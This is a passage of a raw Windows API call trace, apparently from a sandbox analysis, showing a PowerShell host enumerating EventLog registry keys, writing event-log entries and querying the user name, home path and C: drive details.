lpName="Internet Explorer", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.643] CoTaskMemFree (pv=0x23c0a0) [0124.643] CoTaskMemFree (pv=0x0) [0124.643] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.643] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.643] CoTaskMemFree (pv=0x23c0a0) [0124.643] CoTaskMemFree (pv=0x0) [0124.643] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.643] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.643] CoTaskMemFree (pv=0x23c0a0) [0124.643] CoTaskMemFree (pv=0x0) [0124.643] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.643] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.643] CoTaskMemFree (pv=0x23c0a0) [0124.644] CoTaskMemFree (pv=0x0) [0124.644] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.644] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.644] CoTaskMemFree (pv=0x23c0a0) [0124.644] CoTaskMemFree (pv=0x0) [0124.644] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.644] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.644] CoTaskMemFree (pv=0x23c0a0) [0124.644] CoTaskMemFree (pv=0x0) [0124.644] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.644] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.644] CoTaskMemFree (pv=0x23c0a0) [0124.644] CoTaskMemFree (pv=0x0) [0124.644] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x35c) returned 0x0 [0124.645] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.645] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x384) returned 0x0 [0124.645] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.645] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x388) returned 0x0 [0124.645] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.645] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x38c) returned 0x0 [0124.646] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.646] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x390) returned 0x0 [0124.646] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.646] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x394) returned 0x0 [0124.646] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.646] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x398) returned 0x0 [0124.646] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.647] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x39c) returned 0x0 [0124.647] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.647] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x3a0) returned 0x0 [0124.647] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x3a4) returned 0x0 [0124.647] RegCloseKey (hKey=0x3a4) returned 0x0 [0124.647] RegCloseKey (hKey=0x380) returned 0x0 [0124.648] RegCloseKey (hKey=0x3a0) returned 0x0 [0124.649] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d1f8 | out: phkResult=0x10d1f8*=0x3a0) returned 0x0 [0124.649] RegQueryInfoKeyW (in: hKey=0x3a0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10d16c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d168, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10d16c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d168*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.649] CoTaskMemFree (pv=0x0) [0124.649] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.650] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x0, lpName=0x23c0a0, lpcchName=0x10d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.650] CoTaskMemFree (pv=0x23c0a0) [0124.650] CoTaskMemFree (pv=0x0) [0124.650] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.650] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x1, lpName=0x23c0a0, lpcchName=0x10d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.650] CoTaskMemFree (pv=0x23c0a0) [0124.650] CoTaskMemFree (pv=0x0) [0124.650] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.650] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x2, lpName=0x23c0a0, lpcchName=0x10d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.650] CoTaskMemFree (pv=0x23c0a0) [0124.650] CoTaskMemFree (pv=0x0) [0124.650] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.650] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x3, lpName=0x23c0a0, lpcchName=0x10d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.650] CoTaskMemFree (pv=0x23c0a0) [0124.650] CoTaskMemFree (pv=0x0) [0124.650] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.650] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x4, lpName=0x23c0a0, lpcchName=0x10d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.650] CoTaskMemFree (pv=0x23c0a0) [0124.650] CoTaskMemFree (pv=0x0) [0124.650] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.651] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x5, lpName=0x23c0a0, lpcchName=0x10d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.651] CoTaskMemFree (pv=0x23c0a0) [0124.651] CoTaskMemFree (pv=0x0) [0124.651] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.651] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x6, lpName=0x23c0a0, lpcchName=0x10d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.651] CoTaskMemFree (pv=0x23c0a0) [0124.651] CoTaskMemFree (pv=0x0) [0124.651] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.651] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x7, lpName=0x23c0a0, lpcchName=0x10d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.651] CoTaskMemFree (pv=0x23c0a0) [0124.651] CoTaskMemFree (pv=0x0) [0124.651] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.651] RegEnumKeyExW (in: hKey=0x3a0, dwIndex=0x8, lpName=0x23c0a0, lpcchName=0x10d1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10d1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.651] CoTaskMemFree (pv=0x23c0a0) [0124.651] CoTaskMemFree (pv=0x0) [0124.651] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x380) returned 0x0 [0124.652] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x0) returned 0x2 [0124.652] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x3a4) returned 0x0 [0124.652] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x0) returned 0x2 [0124.652] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x3a8) returned 0x0 [0124.652] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x0) returned 0x2 [0124.652] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x3ac) returned 0x0 [0124.652] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x0) returned 0x2 [0124.653] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x3b0) returned 0x0 [0124.653] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x0) returned 0x2 [0124.653] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x3b4) returned 0x0 [0124.653] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x0) returned 0x2 [0124.653] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x3b8) returned 0x0 [0124.653] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x0) returned 0x2 [0124.659] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x3bc) returned 0x0 [0124.659] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x0) returned 0x2 [0124.659] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x3c0) returned 0x0 [0124.659] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d258 | out: phkResult=0x10d258*=0x3c4) returned 0x0 [0124.659] RegCloseKey (hKey=0x3c4) returned 0x0 [0124.660] RegCloseKey (hKey=0x3a0) returned 0x0 [0124.660] RegCloseKey (hKey=0x3c0) returned 0x0 [0124.687] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1baa0008 [0124.695] ReportEventW (hEventLog=0x1baa0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fc6578*="WSMan", lpRawData=0x2fc62e8) returned 1 [0124.699] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0124.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0124.699] CoTaskMemFree (pv=0x2af480) [0124.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.705] CoTaskMemAlloc (cb=0x804) returned 0x1b9b0710 [0124.705] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9b0710, nSize=0x10d4e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d4e8) returned 0x1 [0124.706] CoTaskMemFree (pv=0x1b9b0710) [0124.706] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.706] GetUserNameW (in: lpBuffer=0x23c0a0, pcbBuffer=0x10d528 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d528) returned 1 [0124.713] CoTaskMemFree (pv=0x23c0a0) [0124.713] ReportEventW (hEventLog=0x1baa0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fcbab0*="Alias", lpRawData=0x2fcb840) returned 1 [0124.715] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0124.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0124.715] CoTaskMemFree (pv=0x2af480) [0124.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0124.718] CoTaskMemAlloc (cb=0x804) returned 0x1b9b0710 [0124.719] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9b0710, nSize=0x10d4e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d4e8) returned 0x1 [0124.719] CoTaskMemFree (pv=0x1b9b0710) [0124.719] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.719] GetUserNameW (in: lpBuffer=0x23c0a0, pcbBuffer=0x10d528 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d528) returned 1 [0124.719] CoTaskMemFree (pv=0x23c0a0) [0124.720] ReportEventW (hEventLog=0x1baa0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fd10a8*="Environment", lpRawData=0x2fd0e38) returned 1 [0124.723] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0124.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0124.723] CoTaskMemFree (pv=0x2af480) [0124.724] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0124.724] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0124.724] CoTaskMemFree (pv=0x2af480) [0124.724] CoTaskMemAlloc (cb=0x104) returned 0x2af480 [0124.724] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2af480, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0124.724] CoTaskMemFree (pv=0x2af480) [0124.725] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x10d090, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0124.725] SetErrorMode (uMode=0x1) returned 0x1 [0124.725] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x10d2a0 | out: lpFileInformation=0x10d2a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0124.725] SetErrorMode (uMode=0x1) returned 0x1 [0124.745] GetLogicalDrives () returned 0x4 [0124.748] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10ce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0124.750] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.750] SetErrorMode (uMode=0x1) returned 0x1 [0124.751] CoTaskMemAlloc (cb=0x68) returned 0x2a1370 [0124.751] CoTaskMemAlloc (cb=0x68) returned 0x2a1c30 [0124.751] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2a1370, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x10d270, lpMaximumComponentLength=0x10d26c, lpFileSystemFlags=0x10d268, lpFileSystemNameBuffer=0x2a1c30, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10d270*=0x9c354b42, lpMaximumComponentLength=0x10d26c*=0xff, lpFileSystemFlags=0x10d268*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0124.752] CoTaskMemFree (pv=0x2a1370) [0124.752] CoTaskMemFree (pv=0x2a1c30) [0124.752] SetErrorMode (uMode=0x1) returned 0x1 [0124.752] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.754] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0124.754] SetErrorMode (uMode=0x1) returned 0x1 [0124.754] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10d210 | out: lpFileInformation=0x10d210*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0124.754] SetErrorMode (uMode=0x1) returned 0x1 [0124.754] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0124.754] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10ce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0124.754] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.755] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10cd90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0124.755] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.756] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0124.756] SetErrorMode (uMode=0x1) returned 0x1 [0124.756] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10d040 | out: lpFileInformation=0x10d040*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0124.757] SetErrorMode (uMode=0x1) returned 0x1 [0124.757] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10cde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0124.757] SetErrorMode (uMode=0x1) returned 0x1 [0124.757] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10d040 | out: lpFileInformation=0x10d040*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0124.757] SetErrorMode (uMode=0x1) returned 0x1 [0124.757] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10ce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0124.757] SetErrorMode (uMode=0x1) returned 0x1 [0124.757] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10d0e0 | out: lpFileInformation=0x10d0e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0124.758] SetErrorMode (uMode=0x1) returned 0x1 [0124.758] CoTaskMemAlloc (cb=0x804) returned 0x1b9b0710 [0124.758] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9b0710, nSize=0x10d4e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d4e8) returned 0x1 [0124.759] CoTaskMemFree (pv=0x1b9b0710) [0124.759] CoTaskMemAlloc (cb=0x204) returned 